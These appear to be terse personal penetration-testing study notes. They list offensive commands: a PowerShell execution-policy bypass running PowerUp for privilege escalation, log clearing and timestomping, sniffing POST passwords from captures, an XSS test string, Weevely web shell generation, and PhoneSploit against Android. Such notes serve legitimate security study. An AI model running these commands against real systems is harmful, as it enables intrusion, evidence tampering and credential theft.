xtra_pins_to_pentest_checklists_20222
To be added
25 November 2022 15:35
Execute powershell scripts to get vnc and to bypass AV detection and to get privilage escalation: Upload <path> PowerUp.ps1
Powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
Upload Beroot.exe to get highest Privilage
Clearev used tyo clear the logs
Timestamp secrect.txt -m <"modified Value in the same format">
Tcpdump -nvx port 8888 -i <interface mode> // execute this script on recieve side to monitore the network
To look for logged in user passwords on pcap file http:request.method=POST
OR
Click edit-->Find packet-->[Packt details NAME UTF/8 ACII STRING PWD ] Expand HTML form URL Encode to gbet the details
ANTI DOS Guardian can be used
Ghost eye foortprinting tool nc -vv <url> 80
Telnet <url> 80
Nmap -sV --script=http-enum <Domain>
Nmap --script hostmap-bfk --script-args hostmap-bfk-prefix=hostmap -<url>
<
<script>alert(1)</script> Whatweb<domain> Nmap -T4 -A -v <Domain>
After performing RCE do RDP using added credentials
Directory Listing:
Gobuster dir -a <http://<url>> -w <Wordlists.txt> During login bruteforce use clusterbomb attack Weevely generate <Pass> <Path.php>
Weevely <path.php> <Pass>
Android
Apt-get install adb Git clone phonesploit 3
<type IP> 4
Exit (To exit from the shell)
Last updated